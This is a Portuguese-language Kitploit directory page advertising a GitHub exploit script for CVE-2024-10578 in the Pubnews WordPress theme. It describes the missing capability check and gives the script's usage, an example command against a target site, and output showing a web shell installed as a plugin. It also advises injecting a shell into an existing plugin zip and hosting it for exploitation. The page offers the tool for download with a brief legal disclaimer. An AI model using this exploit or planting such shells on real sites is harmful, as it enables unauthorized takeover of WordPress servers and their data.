Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-10578 — Pubnews <= 1.0.7 - Instalação Não Autenticada de Plugin Arbitrário | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2024-10578
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubnxploited/cve-2024-10578

CVE-2024-10578

Pubnews <= 1.0.7 - Instalação Não Autenticada de Plugin Arbitrário

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-10578: Pubnews <= 1.0.7 - Instalação Não Autenticada de Plugin Arbitrário

Descrição

O tema Pubnews para WordPress é vulnerável à instalação não autorizada de plugins arbitrários devido à falta de verificação de capacidade na função pubnews_importer_plugin_action_for_notice() em todas as versões até, e incluindo, 1.0.7. Esta vulnerabilidade permite que atacantes autenticados com acesso de nível de Assinante ou superior instalem plugins arbitrários que podem ser usados para explorar outras vulnerabilidades.

CWE

  • CWE-434: Upload Irrestrito de Arquivo com Tipo Perigoso

CVSS

  • Pontuação: 8.8 (ALTA)
  • Versão: 3.1
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Script de Exploit: wordpress_exploit.py

Este script explora a vulnerabilidade no tema Pubnews para instalar um plugin arbitrário a partir de uma URL fornecida. O plugin pode conter um shell malicioso ou qualquer outro payload.

Uso

root@kitploit:~

CVE-2024-10578.py [-h] -u URL -un USERNAME -p PASSWORD -url_zip PLUGIN_URL

Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation # By Nxploited, Khaled alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         The URL of the WordPress site
  -un, --username USERNAME
                        The username for WordPress login
  -p, --password PASSWORD
                        The password for WordPress login
  -url_zip, --plugin_url PLUGIN_URL
                        The plugin URL to install (must be a zip file with the shell injected inside)

Exemplo

root@kitploit:~
python 
CVE-2024-10578.py -u http://target/wordpress -un admin -p admin -url_zip http://target/shell1.zip

Saída

root@kitploit:~
[+] Logged in successfully.
[+] Admin _wpnonce extracted: 6bf22371ab
[+] Plugin installed successfully.
[+] Plugin extracted. You can find the shell here: /wp-content/plugins/shell1/

Notas Importantes

  • A URL do plugin deve ser um link direto para um arquivo zip que contenha o shell ou qualquer outro payload.
  • Recomenda-se usar qualquer plugin WordPress existente, injetar o shell dentro dele e zipá-lo novamente. Faça o upload deste arquivo zip para um link direto para exploração.

⚠️ Aviso Legal

Este script é destinado apenas para fins educacionais. O autor não apoia o uso deste script para atividades ilegais. Use-o com responsabilidade e apenas em sistemas que você tenha permissão explícita para testar.

Por: Nxploited | Khaled Alenazi

Baixar ferramenta